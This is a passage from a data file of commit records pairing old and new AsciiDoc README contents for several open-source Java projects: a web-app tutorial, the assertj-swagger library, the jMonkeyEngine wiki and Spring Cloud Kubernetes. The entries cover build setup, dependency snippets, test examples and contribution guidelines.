system\n* NPM, Grunt, Bower, TSG for the web client build\n\n== Requirements\n\n* Java 7 or 8 (JDK) installed\n* Node.js installed\n** Grunt CLI installed (npm install -g 
grunt-cli)\n** Bower installed (npm install -g bower)\n** TSD installed (npm install -g tsd)\n\nIn the vagrant directory you find a Vagrantfile to create a (German) development environment.\n\n* Install Vagrant and VirtualBox\n* Invoke \"vagrant up\" in a terminal\n* Wait for 20 minutes letting Vagrant create the whole virtual machine\n* In the VM, log in as vagrant\/vagrant and then invoke: startx\n* The latest Ubuntu with a simple desktop will start up\n* You find this project at \/home\/vagrant\/webapp-tutorial\n* All Gradle and JavaScript dependencies are already in the VM\n* You find an IntelliJ IDEA trial under \/opt\n* Before starting IntelliJ you have to configure the Java 8 JDK\n* After starting IntelliJ you have to install the Lombok plugin manually.\n\n== Getting Started\n\nWhen you want to run the tutorial locally, prepare all the labs:\n\n* .\/gradlew prepareJs (invokes npm install, bower install, tsd reinstall on all JavaScript projects)\n* .\/gradlew clean build (builds all the tutorial labs (Java parts), runs all the Java tests)\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"242fec91565e71327005572d4f3ac0070060323e","subject":"Updated documentation","message":"Updated documentation","repos":"thomsonreuters\/assertj-swagger,RobWin\/assertj-swagger","old_file":"README.adoc","new_file":"README.adoc","new_contents":"= assertj-swagger\n:author: Robert Winkler\n:version: 0.1.1\n:hardbreaks:\n\nimage:https:\/\/travis-ci.org\/RobWin\/assertj-swagger.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/RobWin\/assertj-swagger\"] image:https:\/\/coveralls.io\/repos\/RobWin\/assertj-swagger\/badge.svg?branch=master[\"Coverage Status\", link=\"https:\/\/coveralls.io\/r\/RobWin\/assertj-swagger\"] image:https:\/\/api.bintray.com\/packages\/robwin\/maven\/assertj-swagger\/images\/download.svg[link=\"https:\/\/bintray.com\/robwin\/maven\/assertj-swagger\/_latestVersion\"] image:http:\/\/img.shields.io\/badge\/license-ASF2-blue.svg[\"Apache License 2\", link=\"http:\/\/www.apache.org\/licenses\/LICENSE-2.0.txt\"]\n\n== Overview\n\nassertj-swagger is an https:\/\/github.com\/joel-costigliola\/assertj-core[assertj] library which compares a contract-first https:\/\/github.com\/swagger-api\/swagger-spec[Swagger] YAML\/JSON file with a code-first Swagger JSON output (e.g. from https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger]). assertj-swagger allows you to validate that the API implementation is in compliance with the contract specification. The library supports the Swagger 1.2 and 2.0 specification for the code-first Swagger JSON, but only 2.0 for the contract-first Swagger file.\nassertj-swagger compares Swagger objects like Paths, Parameters and Definitions. 
It does not compare __unimportant__ Swagger objects like info, descriptions or summaries.\n\n== Usage guide\n\n=== Adding assertj-swagger to your project\nThe project is published in JCenter and Maven Central.\n\n==== Maven\n\n[source,xml]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>central<\/id>\n <name>bintray<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.robwin<\/groupId>\n <artifactId>assertj-swagger<\/artifactId>\n <version>0.1.1<\/version>\n<\/dependency>\n----\n\n==== Gradle\n\n[source,groovy]\n----\nrepositories {\n jcenter()\n}\n\ncompile \"io.github.robwin:assertj-swagger:0.1.1\"\n----\n\n=== Using assertj-swagger in an integration test\n\nUsing assertj-swagger is simple. For example, if you are using https:\/\/github.com\/spring-projects\/spring-boot[Spring Boot] and https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger], you can validate your Swagger JSON in an integration test.\n\n[source, java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = Application.class)\n@IntegrationTest\n@WebAppConfiguration\npublic class AssertjSwaggerTest {\n @Test\n public void validateThatImplementationFitsDesignSpecification(){\n String designFirstSwagger = SwaggerAssertTest.class.getResource(\"\/swagger.yaml\").getPath();\n SwaggerAssertions.assertThat(\"http:\/\/localhost:8080\/v2\/api-docs\")\n .isEqualTo(designFirstSwagger);\n }\n}\n----\n\n==== Example output\n\nAssertj-swagger fails a test if it finds differences between the implementation and the specification.\n\n[source]\n----\nThe following 4 assertions failed:\n1) [Checking Paths] \nExpecting:\n <[\"\/api\/pet\", \"\/api\/pet\/findByStatus\", \"\/api\/pet\/findByTags\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\", \"\/api\/user\/createWithArray\", \"\/api\/user\/createWithList\", \"\/api\/user\/login\", \"\/api\/user\/logout\", \"\/api\/user\/{username}\"]>\nto contain only:\n <[\"\/pets\", \"\/pets\/findByStatus\", \"\/pets\/findByTags\", \"\/pets\/{petId}\", \"\/stores\/order\", \"\/stores\/order\/{orderId}\", \"\/users\", \"\/users\/createWithArray\", \"\/users\/createWithList\", \"\/users\/login\", \"\/users\/logout\", \"\/users\/{username}\"]>\nelements not found:\n <[\"\/pets\/findByTags\", \"\/users\/logout\", \"\/users\", \"\/stores\/order\", \"\/users\/createWithArray\", \"\/pets\", \"\/users\/createWithList\", \"\/pets\/findByStatus\", \"\/pets\/{petId}\", \"\/users\/{username}\", \"\/stores\/order\/{orderId}\", \"\/users\/login\"]>\nand elements not expected:\n <[\"\/api\/store\/order\", \"\/api\/user\", \"\/api\/user\/createWithList\", \"\/api\/pet\", \"\/api\/pet\/findByTags\", \"\/api\/user\/createWithArray\", \"\/api\/user\/login\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\/{username}\", \"\/api\/pet\/findByStatus\", \"\/api\/user\/logout\"]>\n\n2) [Checking properties of definition 'Order'] \nExpecting:\n <[\"complete\", \"id\", \"identifier\", \"petId\", \"quantity\", \"shipDate\", \"status\"]>\nto contain only:\n <[\"id\", \"petId\", \"quantity\", \"shipDate\", \"status\", \"complete\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n\n3) [Checking properties of definition 'User'] \nExpecting:\n <[\"email\", \"firstName\", \"id\", 
\"identifier\", \"lastName\", \"password\", \"phone\", \"userStatus\", \"username\"]>\nto contain only:\n <[\"id\", \"username\", \"firstName\", \"lastName\", \"email\", \"password\", \"phone\", \"userStatus\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n\n4) [Checking properties of definition 'Pet'] \nExpecting:\n <[\"category\", \"id\", \"identifier\", \"name\", \"photoUrls\", \"status\", \"tags\"]>\nto contain only:\n <[\"id\", \"category\", \"name\", \"photoUrls\", \"tags\", \"status\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n----\n\n=== Using assertj-swagger in an unit test\n\nIf you are using the https:\/\/github.com\/spring-projects\/spring-framework[spring-framework] and https:\/\/github.com\/springfox\/springfox[springfox], Spring's MVC Test framework can also be used to validate the Swagger JSON output against your contract-first Swagger specification.\nThat way you can make sure that the implementation is in compliance with the design specification. \n\n[source, java]\n----\n@Test\npublic void validateThatImplementationFitsDesignSpecification() throws Exception {\n String designFirstSwaggerLocation = Swagger2MarkupTest.class.getResource(\"\/swagger.yaml\").getPath();\n\n MvcResult mvcResult = this.mockMvc.perform(get(\"\/v2\/api-docs\")\n .accept(MediaType.APPLICATION_JSON))\n .andExpect(status().isOk())\n .andReturn();\n\n String springfoxSwaggerJson = mvcResult.getResponse().getContentAsString();\n SwaggerAssertions.assertThat(Swagger20Parser.parse(springfoxSwaggerJson)).isEqualTo(designFirstSwaggerLocation);\n}\n----\n\n== License\n\nCopyright 2015 Robert Winkler\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n","old_contents":"= assertj-swagger\n:author: Robert Winkler\n:version: 0.1.1\n:hardbreaks:\n\nimage:https:\/\/travis-ci.org\/RobWin\/assertj-swagger.svg[\"Build Status\", link=\"https:\/\/travis-ci.org\/RobWin\/assertj-swagger\"] image:https:\/\/coveralls.io\/repos\/RobWin\/assertj-swagger\/badge.svg?branch=master[\"Coverage Status\", link=\"https:\/\/coveralls.io\/r\/RobWin\/assertj-swagger\"] image:https:\/\/api.bintray.com\/packages\/robwin\/maven\/assertj-swagger\/images\/download.svg[link=\"https:\/\/bintray.com\/robwin\/maven\/assertj-swagger\/_latestVersion\"] image:http:\/\/img.shields.io\/badge\/license-ASF2-blue.svg[\"Apache License 2\", link=\"http:\/\/www.apache.org\/licenses\/LICENSE-2.0.txt\"]\n\n== Overview\n\nassertj-swagger is a https:\/\/github.com\/joel-costigliola\/assertj-core[assertj] library which compares a contract-first https:\/\/github.com\/swagger-api\/swagger-spec[Swagger] YAML\/JSON file with a code-first Swagger JSON output (e.g. from https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger]). assertj-swagger allows to validate that the API implementation is in compliance with the contract specification. 
The library supports the Swagger 1.2 and 2.0 specification for the code-first Swagger JSON, but only 2.0 for the contract-first Swagger file.\nassertj-swagger compares Swagger objects like Paths, Parameters and Definitions. It does not compare __unimportant__ Swagger objects like info, descriptions or summaries.\n\n== Usage guide\n\n=== Adding assertj-swagger to your project\nThe project is published in JCenter and Maven Central.\n\n==== Maven\n\n[source,xml]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>central<\/id>\n <name>bintray<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.robwin<\/groupId>\n <artifactId>assertj-swagger<\/artifactId>\n <version>0.1.1<\/version>\n<\/dependency>\n----\n\n==== Gradle\n\n[source,groovy]\n----\nrepositories {\n jcenter()\n}\n\ncompile \"io.github.robwin:assertj-swagger:0.1.1\"\n----\n\n=== Using assertj-swagger in an integration test\n\nUsing assertj-swagger is simple. For example, if you are using https:\/\/github.com\/spring-projects\/spring-boot[Spring Boot] and https:\/\/github.com\/springfox\/springfox[springfox] or https:\/\/github.com\/swagger-api\/swagger-core\/wiki\/Java-JAXRS-Quickstart[JAX-RS Swagger], you can validate your Swagger JSON in an integration test.\n\n[source, java]\n----\n@RunWith(SpringJUnit4ClassRunner.class)\n@SpringApplicationConfiguration(classes = Application.class)\n@IntegrationTest\n@WebAppConfiguration\npublic class AssertjSwaggerTest {\n @Test\n public void validateThatImplementationFitsDesignSpecification(){\n String designFirstSwagger = SwaggerAssertTest.class.getResource(\"\/swagger.yaml\").getPath();\n SwaggerAssertions.assertThat(\"http:\/\/localhost:8080\/v2\/api-docs\")\n .isEqualTo(designFirstSwagger);\n }\n}\n----\n\n==== Example output\n\n[source]\n----\nThe following 4 assertions failed:\n1) [Checking Paths] \nExpecting:\n <[\"\/api\/pet\", \"\/api\/pet\/findByStatus\", \"\/api\/pet\/findByTags\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\", \"\/api\/user\/createWithArray\", \"\/api\/user\/createWithList\", \"\/api\/user\/login\", \"\/api\/user\/logout\", \"\/api\/user\/{username}\"]>\nto contain only:\n <[\"\/pets\", \"\/pets\/findByStatus\", \"\/pets\/findByTags\", \"\/pets\/{petId}\", \"\/stores\/order\", \"\/stores\/order\/{orderId}\", \"\/users\", \"\/users\/createWithArray\", \"\/users\/createWithList\", \"\/users\/login\", \"\/users\/logout\", \"\/users\/{username}\"]>\nelements not found:\n <[\"\/pets\/findByTags\", \"\/users\/logout\", \"\/users\", \"\/stores\/order\", \"\/users\/createWithArray\", \"\/pets\", \"\/users\/createWithList\", \"\/pets\/findByStatus\", \"\/pets\/{petId}\", \"\/users\/{username}\", \"\/stores\/order\/{orderId}\", \"\/users\/login\"]>\nand elements not expected:\n <[\"\/api\/store\/order\", \"\/api\/user\", \"\/api\/user\/createWithList\", \"\/api\/pet\", \"\/api\/pet\/findByTags\", \"\/api\/user\/createWithArray\", \"\/api\/user\/login\", \"\/api\/pet\/{petId}\", \"\/api\/store\/order\/{orderId}\", \"\/api\/user\/{username}\", \"\/api\/pet\/findByStatus\", \"\/api\/user\/logout\"]>\n\n2) [Checking properties of definition 'Order'] \nExpecting:\n <[\"complete\", \"id\", \"identifier\", \"petId\", \"quantity\", \"shipDate\", \"status\"]>\nto contain only:\n <[\"id\", \"petId\", \"quantity\", \"shipDate\", \"status\", \"complete\"]>\nelements not found:\n <[]>\nand elements not expected:\n 
<[\"identifier\"]>\n\n3) [Checking properties of definition 'User'] \nExpecting:\n <[\"email\", \"firstName\", \"id\", \"identifier\", \"lastName\", \"password\", \"phone\", \"userStatus\", \"username\"]>\nto contain only:\n <[\"id\", \"username\", \"firstName\", \"lastName\", \"email\", \"password\", \"phone\", \"userStatus\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n\n4) [Checking properties of definition 'Pet'] \nExpecting:\n <[\"category\", \"id\", \"identifier\", \"name\", \"photoUrls\", \"status\", \"tags\"]>\nto contain only:\n <[\"id\", \"category\", \"name\", \"photoUrls\", \"tags\", \"status\"]>\nelements not found:\n <[]>\nand elements not expected:\n <[\"identifier\"]>\n----\n\n=== Using assertj-swagger in an unit test\n\nIf you are using the https:\/\/github.com\/spring-projects\/spring-framework[spring-framework] and https:\/\/github.com\/springfox\/springfox[springfox], Spring's MVC Test framework can also be used to validate the Swagger JSON output against your contract-first Swagger specification.\nThat way you can make sure that the implementation is in compliance with the design specification. \n\n[source, java]\n----\n@Test\npublic void validateThatImplementationFitsDesignSpecification() throws Exception {\n String designFirstSwaggerLocation = Swagger2MarkupTest.class.getResource(\"\/swagger.yaml\").getPath();\n\n MvcResult mvcResult = this.mockMvc.perform(get(\"\/v2\/api-docs\")\n .accept(MediaType.APPLICATION_JSON))\n .andExpect(status().isOk())\n .andReturn();\n\n String springfoxSwaggerJson = mvcResult.getResponse().getContentAsString();\n SwaggerAssertions.assertThat(Swagger20Parser.parse(springfoxSwaggerJson)).isEqualTo(designFirstSwaggerLocation);\n}\n----\n\n== License\n\nCopyright 2015 Robert Winkler\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9a74cec0d61f391adf22996b1d56b726409f6f9","subject":"Test commit #3","message":"Test commit #3","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"README.adoc","new_file":"README.adoc","new_contents":":experimental:\n\nimage:https:\/\/travis-ci.org\/jMonkeyEngine\/wiki.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/jMonkeyEngine\/wiki\"]\n\n= jMonkeyEngine Documentation\n\nsee link:https:\/\/jmonkeyengine.github.io\/wiki\/documentation[https:\/\/jmonkeyengine.github.io\/wiki\/documentation]\n\nThe project to store, edit, and generate the documentation of http:\/\/jmonkeyengine.org[jMonkeyEngine].\n\nThe documentation (<<src\/docs\/asciidoc>>) is editable :\n\n* online via github (Edit button located at top of the Wiki page + Pull Request)\n* offline with Netbeans after local `git clone` + open\n* offline with Atom editor, see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/atom_editor.html[Atom Editor for Wiki Editing]\n\n.Prerequisites\n. 
Have a link:https:\/\/github.com\/[GitHub account].\n. Optional: Are a Wiki project member.\n\nIf you are not a member, you can fork the repository into your GitHub account and issue pull requests from there or\nonline via GitHub. (Edit button located at top of the Wiki page + Pull Request)\n\nTo fork the Wiki repository into your GitHub Account:\n\n* In the menu at the top of the page, select the *Fork* button.\n\nThe syntax is AsciiDoc:\n\n* link:http:\/\/asciidoctor.org\/docs\/asciidoc-syntax-quick-reference\/[Asciidoc Syntax Quick Reference]\n* link:http:\/\/asciidoctor.org\/docs\/user-manual\/#introduction-to-asciidoctor[Asciidoctor User Manual]\n\nAn easy-to-use primer for GitHub commands can be found here:\n\n* link:http:\/\/rogerdudler.github.io\/git-guide\/[git - the simple guide]\n\n== Contribute\n\nThere are a few simple rules to follow when contributing.\n\n. It's not required but it's a good idea to give a heads-up that you made a P\/R on the link:https:\/\/hub.jmonkeyengine.org\/[jMonkeyEngine Forum] under the `Documentation` topic.\n. When adding documents, make sure to always complete the header of your document first.\n** see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/wiki_header.html[Anatomy of a Wiki Header]\n. When linking to other Wiki pages, always use an \"`Inter-Document Cross Reference`\" with the format,\n** ++<<path\/to\/wiki\/page#,custom label text>>++ +\nThe `#` sign substitutes for the file extension. This type of link will first look for the `.adoc` file and if not found default to the `.html` version.\n+\nThe path should be relative to the `asciidoc` folder.\n+\nFor example: `++<<jme3\/requirements#,Software and hardware requirements>>++` +\nlinks to the `requirements.adoc` page, which lives in a sub-folder of `asciidoc` named `jme3`.\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references[http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references] for more info.\n. When linking to images stored in the wiki repository, always use an image prefix in front of the file name and square brackets after it with the format,\n** Image on its own line - `image::path\/to\/image.jpg[image alt text,width=\" \",height=\" \", align=\" \"]`\n+\nFor example: `++image::jme3\/beginner\/beginner-assets-models.png[beginner-assets-models.png,320,250,align=\"center\"]++`\n+\n* This image is on its own line.\n* Is stored in the `jme3\/beginner` folder which lives in the `images` folder.\n* Is named `beginner-assets-models.png`.\n* Has an `alt text` name of `beginner-assets-models.png`.\n* Has a width of 320.\n* Has a height of 250.\n* Is aligned in the center of the page.\n** If you want to include an image inline, use the `image:` prefix instead (notice there is only one colon):\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#images[http:\/\/asciidoctor.org\/docs\/user-manual\/#images] for in-depth instructions.\n\n\n== Build\n\n* In Netbeans, convert the AsciiDoc to HTML5 by invoking the 'asciidoctor' goal:\n+\n[source]\n----\n $ .\/gradlew asciidoctor\n----\n+\nOpen the file _build\/asciidoc\/html5\/index.html_ in your browser to see the generated HTML file.\n\n* In Atom, you see real-time changes when using the `AsciiDoc Preview` (kbd:[ctrl]+kbd:[shift]+kbd:[A] or `menu:Packages[AsciiDoc Preview>Toggle Preview]`). 
No build is required.\n\n== TODO\n\n- [x] configure travis build\n- [x] configure github + gradle + travis to publish on gh-pages branches\n- [x] find and fix conversion bug\n- [x] complete conversion: note, warning, ...\n- [x] fix warning during html's generation (should be fixed manually)\n- [x] add meta info during conversion (doctitle, revision, tags, ...)\n- [x] add a home page (index.html)\n- [ ] add a navigation bar or a menu (?)\n- [ ] customize html layout (header, footer, css)\n- [x] transfer ownership to jMonkeyEngine org\n- [x] complete Doc, how to contribute,...\n- [ ] accept Pull Request\n- [ ] write a post about the migration (the tools, why asciidoc, vs alternatives, how ...)\n- [ ] generate sitemap\n- [x] add search box\n- [ ] add google analytics (?)\n- [ ] support emoji\n- [ ] support iframe block\n- [x] fix slideshow of \"Xxx for Dummies\"\n- [ ] optimize: remove useless images\n- [ ] optimize image, use smaller file, e.g. convert to jpg or to webp, resize\n- [ ] organize i18n \/ lang\n- [ ] use tags to create taxonomy\n","old_contents":":experimental:\n\nimage:https:\/\/travis-ci.org\/jMonkeyEngine\/wiki.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/jMonkeyEngine\/wiki\"]\n\n= jMonkeyEngine Documentation\n\nsee link:https:\/\/jmonkeyengine.github.io\/wiki\/documentation[https:\/\/jmonkeyengine.github.io\/wiki\/documentation]\n\nThe project to store, edit, and generate the documentation of http:\/\/jmonkeyengine.org[jMonkeyEngine].\n\nThe documentation (<<src\/docs\/asciidoc>>) is editable :\n\n* online via github (Edit button located at top of the Wiki page + Pull Request)\n* offline with Netbeans after local `git clone` + open\n* offline with Atom editor, see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/atom_editor.html[Atom Editor for Wiki Editing]\n\n.Prerequisites\n. Have a link:https:\/\/github.com\/[GitHub account].\n. Optional: Are a Wiki project member.\n\nIf you are not a member, you can fork the repository into your GitHub account and issue pull requests from there or\nonline via github. (Edit button located at top of the Wiki page + Pull Request)\n\nTo fork the Wiki repository into your GitHub Account:\n\n* In the menu at the top of the page, select the *Fork* button.\n\nThe syntax is asciidoc :\n\n* link:http:\/\/asciidoctor.org\/docs\/asciidoc-syntax-quick-reference\/[Asciidoc Syntax Quick Reference]\n* link:http:\/\/asciidoctor.org\/docs\/user-manual\/#introduction-to-asciidoctor[Asciidoctor User Manual]\n\nAn easy to use primer for GitHub commands can be found here:\n\n* link:http:\/\/rogerdudler.github.io\/git-guide\/[git - the simple guide]\n\n\n== Contribute\n\nThere are a few simple rules to follow when contributing.\n\n. It's not required but it's a good idea to give a heads up you made a P\/R on the link:https:\/\/hub.jmonkeyengine.org\/[jMonkeyEngine Forum] under the `Documentation` topic.\n. When adding documents, make sure to always complete the header of your document first.\n** see link:https:\/\/jmonkeyengine.github.io\/wiki\/wiki\/wiki_header.html[Anatomy of a Wiki Header]\n. When linking to other Wiki pages, always use an \"`Inter-Document Cross Reference`\" with the format,\n** ++<<path\/to\/wiki\/page#,custom label text>>++ +\nThe `#` sign substitutes for the file extension. 
This type of link will first look for the `.adoc` file and if not found default to the `.html` version.\n+\nThe path should be relative to the `asciidoc` folder.\n+\nFor example: `++<<jme3\/requirements#,Software and hardware requirements>>++` +\nlinks to the `requirements.adoc` page, which lives in a sub-folder of `asciidoc` named `jme3`.\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references[http:\/\/asciidoctor.org\/docs\/user-manual\/#inter-document-cross-references] for more info.\n. When linking to images stored in the wiki repository, always use an image prefix in front of the file name and square brackets after it with the format,\n** Image on its own line - `image::path\/to\/image.jpg[image alt text,width=\" \",height=\" \", align=\" \"]`\n+\nFor example: `++image::jme3\/beginner\/beginner-assets-models.png[beginner-assets-models.png,320,250,align=\"center\"]++`\n+\n* This image is on its own line.\n* Is stored in the `jme3\/beginner` folder which lives in the `images` folder.\n* Is named `beginner-assets-models.png`.\n* Has a `alt text` name of `beginner-assets-models.png`.\n* Has a width of 320.\n* Has a height of 250.\n* Is aligned in the center of the page.\n** If you want to include an image inline, use the `image:` prefix instead (notice there is only one colon):\n+\nSee link:http:\/\/asciidoctor.org\/docs\/user-manual\/#images[http:\/\/asciidoctor.org\/docs\/user-manual\/#images] for in depth instructions.\n\n\n== Build\n\n* In Netbeans, convert the AsciiDoc to HTML5 by invoking the 'asciidoctor' goal:\n+\n[source]\n----\n $ .\/gradlew asciidoctor\n----\n+\nOpen the file _build\/asciidoc\/html5\/index.html_ in your browser to see the generated HTML file.\n\n* In Atom, you see real time changes when using the `AsciiDoc Preview` (kbd:[ctrl]+kbd:[shift]+kbd:[A] or `menu:Packages[AsciiDoc Preview>Toggle Preview]`). No build is required.\n\n== TODO\n\n- [x] configure travis build\n- [x] configure github + gradle + travis to publish on gh-pages branches\n- [x] find and fixe conversion bug\n- [x] complete conversion: note, warning, ...\n- [x] fix warning during html's generation (should be fixed manually)\n- [x] add meta info during conversion (doctitle, revision, tags, ...)\n- [x] add a home page (index.html)\n- [ ] add a navigation bar or a menu (?)\n- [ ] customize html layout (header, footer, css)\n- [x] transfer ownership to jMonkeyEngine org\n- [x] complete Doc, how to contribute,...\n- [ ] accept Pull Request\n- [ ] write a post about the migration (the tools, why asciidoc, vs alternatives, how ...)\n- [ ] generate sitemap\n- [x] add search box\n- [ ] add google analytics (?)\n- [ ] support emoji\n- [ ] support iframe block\n- [x] fix slideshow of \"Xxx for Dummies\"\n- [ ] optimize remove useless images\n- [ ] optimize image, use smaller file, eg convert to jpg or to webp, resize\n- [ ] organize i18n \/ lang\n- [ ] use tags to create taxonomy\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"d71eaffcb9cf33b661af9e9ed0019bcb379f9194","subject":"Bumping versions","message":"Bumping versions","repos":"spring-cloud-incubator\/spring-cloud-kubernetes","old_file":"README.adoc","new_file":"README.adoc","new_contents":"\/\/\/\/\nDO NOT EDIT THIS FILE. 
IT WAS GENERATED.\nManual changes to this file will be lost when it is generated again.\nEdit the files in the src\/main\/asciidoc\/ directory instead.\n\/\/\/\/\n\n\n= Spring Cloud Kubernetes\n:doctype: book\n:idprefix:\n:idseparator: -\n:toc: left\n:toclevels: 4\n:tabsize: 4\n:numbered:\n:sectanchors:\n:sectnums:\n:icons: font\n:hide-uri-scheme:\n:docinfo: shared,private\n\n:sc-ext: java\n:project-full-name: Spring Cloud Kubernetes\n:all: {asterisk}{asterisk}\n\nThis reference guide covers how to use Spring Cloud Kubernetes.\n\n== Why do you need Spring Cloud Kubernetes?\n\nSpring Cloud Kubernetes provides implementations of well known Spring Cloud interfaces allowing developers to build and run Spring Cloud applications on Kubernetes. While this project may be useful to you when building a cloud native application, it is also not a requirement in order to deploy a Spring Boot app on Kubernetes. If you are just getting started in your journey to running your Spring Boot app on Kubernetes you can accomplish a lot with nothing more than a basic Spring Boot app and Kubernetes itself. To learn more, you can get started by reading the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#cloud-deployment-kubernetes[Spring Boot reference documentation for deploying to Kubernetes ] and also working through the workshop material https:\/\/hackmd.io\/@ryanjbaxter\/spring-on-k8s-workshop[Spring and Kubernetes].\n\n== Starters\n\nStarters are convenient dependency descriptors you can include in your\napplication. Include a starter to get the dependencies and Spring Boot\nauto-configuration for a feature set.\n\n[cols=\"a,d\"]\n|===\n| Starter | Features\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n| <<DiscoveryClient for Kubernetes,Discovery Client>> implementation that\nresolves service names to Kubernetes Services.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-config<\/artifactId>\n<\/dependency>\n----\n| Load application properties from Kubernetes\n<<configmap-propertysource,ConfigMaps>> and <<Secrets PropertySource,Secrets>>.\n<<propertysource-reload,Reload>> application properties when a ConfigMap or\nSecret changes.\n\n| [source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-all<\/artifactId>\n<\/dependency>\n----\n| All Spring Cloud Kubernetes features.\n\n|===\n\n== DiscoveryClient for Kubernetes\n\nThis project provides an implementation of https:\/\/github.com\/spring-cloud\/spring-cloud-commons\/blob\/master\/spring-cloud-commons\/src\/main\/java\/org\/springframework\/cloud\/client\/discovery\/DiscoveryClient.java[Discovery Client]\nfor https:\/\/kubernetes.io[Kubernetes].\nThis client lets you query Kubernetes endpoints (see https:\/\/kubernetes.io\/docs\/user-guide\/services\/[services]) by name.\nA service is typically exposed by the Kubernetes API server as a collection of endpoints that represent `http` and `https` addresses and that a client can\naccess from a Spring Boot application running as a pod.\n\nThis is something that you get for free by adding the following dependency inside your project:\n\n====\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes<\/artifactId>\n<\/dependency>\n----\n====\n\nTo 
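use Gradle instead of Maven, a sketch of the equivalent declaration (assuming the same artifact coordinates as in the Maven snippet above) would be:\n\n====\n[source,groovy]\n----\ndependencies {\n implementation 'org.springframework.cloud:spring-cloud-starter-kubernetes'\n}\n----\n====\n\nTo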
enable loading of the `DiscoveryClient`, add `@EnableDiscoveryClient` to the corresponding configuration or application class, as the following example shows:\n\n====\n[source,java]\n----\n@SpringBootApplication\n@EnableDiscoveryClient\npublic class Application {\n public static void main(String[] args) {\n SpringApplication.run(Application.class, args);\n }\n}\n----\n====\n\nThen you can inject the client in your code simply by autowiring it, as the following example shows:\n\n====\n[source,java]\n----\n@Autowired\nprivate DiscoveryClient discoveryClient;\n----\n====\n\nYou can choose to enable `DiscoveryClient` from all namespaces by setting the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf, for any reason, you need to disable the `DiscoveryClient`, you can set the following property in `application.properties`:\n\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.enabled=false\n----\n====\n\nSome Spring Cloud components use the `DiscoveryClient` in order to obtain information about the local service instance. For\nthis to work, you need to align the Kubernetes service name with the `spring.application.name` property.\n\nNOTE: `spring.application.name` has no effect on the name registered for the application within Kubernetes.\n\nSpring Cloud Kubernetes can also watch the Kubernetes service catalog for changes and update the\n`DiscoveryClient` implementation accordingly. In order to enable this functionality you need to add\n`@EnableScheduling` on a configuration class in your application.\n\n== Kubernetes native service discovery\n\nKubernetes itself is capable of (server side) service discovery (see: https:\/\/kubernetes.io\/docs\/concepts\/services-networking\/service\/#discovering-services).\nUsing native Kubernetes service discovery ensures compatibility 